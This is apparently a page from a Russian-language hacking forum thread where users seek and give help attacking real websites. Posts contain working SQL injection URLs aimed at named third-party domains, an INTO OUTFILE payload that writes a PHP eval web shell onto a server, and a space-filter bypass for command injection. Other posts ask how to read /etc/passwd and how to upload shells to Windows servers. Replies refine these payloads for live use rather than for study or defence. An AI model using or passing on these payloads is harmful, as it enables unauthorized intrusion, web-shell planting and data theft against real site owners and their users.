Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. NichRaMEs

    NichRaMEs New Member

    Joined:
    23 Jan 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую Вас. Я хотел бы спросить, возможно ли залить шелл на XenForo версии 1.0.4? Если да, то стучите в ЛС. Или расскажите тут. Заранее благодарен)
     
  2. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    помогите раскрутить,что то не получается
    инъекция в заголовке в x-forwarded-for: 1'"
    Code:
    http://drive.s13.ru/?id=1
    а то чё то туплю.
     
  3. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Залил shell на форум,открыл но там такая ситуация.
    http://savepic.org/2581219.png
    права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.
     
  4. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    пробуй так
    Code:
    ls$IFS-la
     
    2 people like this.
  6. DonaldDuck

    DonaldDuck New Member

    Joined:
    29 Apr 2012
    Messages:
    110
    Likes Received:
    3
    Reputations:
    1
    Запрос:
    Code:
    http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'<?php eval($_GET[‘e’]) ?>',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+

    Результат (файл rengl.cz/1.php не создается):
    Code:
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37
    Почему?
     
  7. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    <?php eval($_GET[‘e’]) ?> в HEX переведи попробуй.
    Может ещё быть что прав нет на корневую папку,ищи врайтабельную.
     
    #21747 Faaax, 21 Jan 2013
    Last edited: 21 Jan 2013
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Да что вы говорите ? И из hex код исполнится ? Бред !!

    <?php eval($_GET[‘e’]) ?> можно и нужно урезать до <?php eval($_GET[e]); ?>

    Попробуй.
     
    _________________________
  9. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Есть скуля, раскрутить не знаю как

    _http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%25D0%25B4%25D1%2582%25D0%25B8&catid=171
     
  10. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Code:
    http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+[COLOR=DarkRed]version()[/COLOR]+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf
    Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
     
    #21750 Zed0x, 21 Jan 2013
    Last edited: 21 Jan 2013
    2 people like this.
  11. ART-inc

    ART-inc New Member

    Joined:
    27 Jun 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Имеется доступ в site/mysql/scripts/setup.php. pma 2.11.11.3. Как получить доступ к бд ?
     
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    как тут раскрутить тогда?

    _http://www.orehi.net.ua/component/option,com_fireboard/Itemid,43/func,view'/id,9/view,threaded/catid,3/
     
  13. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Собственно нужна помощь:
    1) Имею скуль "MySQL error based"
    2) Вот пример скули, при которой у меня выдает название Базы данных сайта
    PHP:
    site.ru/catalog/type/0/1+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,database(),0x27,0x7e))+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1
    3) Как мне использую данную скуль прочитать etc/passwd ?
    4) Как залить шелл через скуль имея полный путь до сайта и file_priv=Y
     
  14. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    delete
     
    #21754 Artrix, 23 Jan 2013
    Last edited: 23 Jan 2013
  15. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Не могу раскрутить одну SQL, её запрос:
    SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
    SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
    Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
    Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
    Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?

    Сам URL спалить никак не смогу.
     
    1 person likes this.
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    SELECT req, id FROM table_name WHERE `link` = '1' and (SUBSTRING((SELECT version()),1,1))=5#' AND `count` > 0
    Что мешает крутить блиндем?
     
    _________________________
    #21756 winstrool, 23 Jan 2013
    Last edited: 23 Jan 2013
    1 person likes this.
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Попробуйте метод с name_const, очень часто выручает в случаях где надо выполнять запрос без пробелов в Error-Based!
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    юзер вводит, допустим, имя и сохрняет настройки, обновляет страничку - подгружается js скрипт, который формирует табличку с его именем через innerhtml. мы можем через xss в DOM объекте подгрузить произвольный скрипт? у меня не получилос( только косвенно... через инпутовский автофокус.
     
  19. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?
     
  20. nicols

    nicols Banned

    Joined:
    20 Aug 2012
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Интересная скуля (помогите)

    Имеется ссылка вида :
    _http://site.com/news.php?page=0

    Добавляю кавычку и появляется вот что
    [​IMG]

    ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!
     
Thread Status:
Not open for further replies.